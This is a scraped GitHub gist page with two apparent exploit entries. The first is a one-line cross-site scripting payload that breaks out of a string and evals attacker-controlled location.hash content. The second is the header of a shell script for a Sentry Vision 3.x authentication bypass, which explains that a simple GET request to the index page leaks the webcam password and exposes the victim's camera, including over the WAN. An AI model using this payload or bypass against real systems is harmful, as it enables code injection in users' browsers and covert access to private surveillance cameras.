pabloonicarres
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '';var msgbox;if(location.hash){eval(location.hash.slice(1))}else{alert(1)}// msgbox+1 |
pabloonicarres
/ sentryvision_authentication_bypass_vulnerability.sh
Last active
March 29, 2018 12:58
Authentication Bypass Sentry Vision 3.x
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################## | |
| #Sentry Vision 3.x Authentication Bypass | |
| #Paolo Serracino e Pierluca De Santis | |
| #The sentry vision is offered in free download as a security tool for remoting | |
| #webcam surveillance. | |
| #Authentication is managed on client side. A GET request to the index page | |
| #is enough to retrieve the webcam password and to successfully authenticate, | |
| #resulting in access to the victim webcam. | |
| #Due to the nature of the software, vendor also suggests to use port forwarding | |
| #to make the cam reachable (and exploitable) even from WAN. |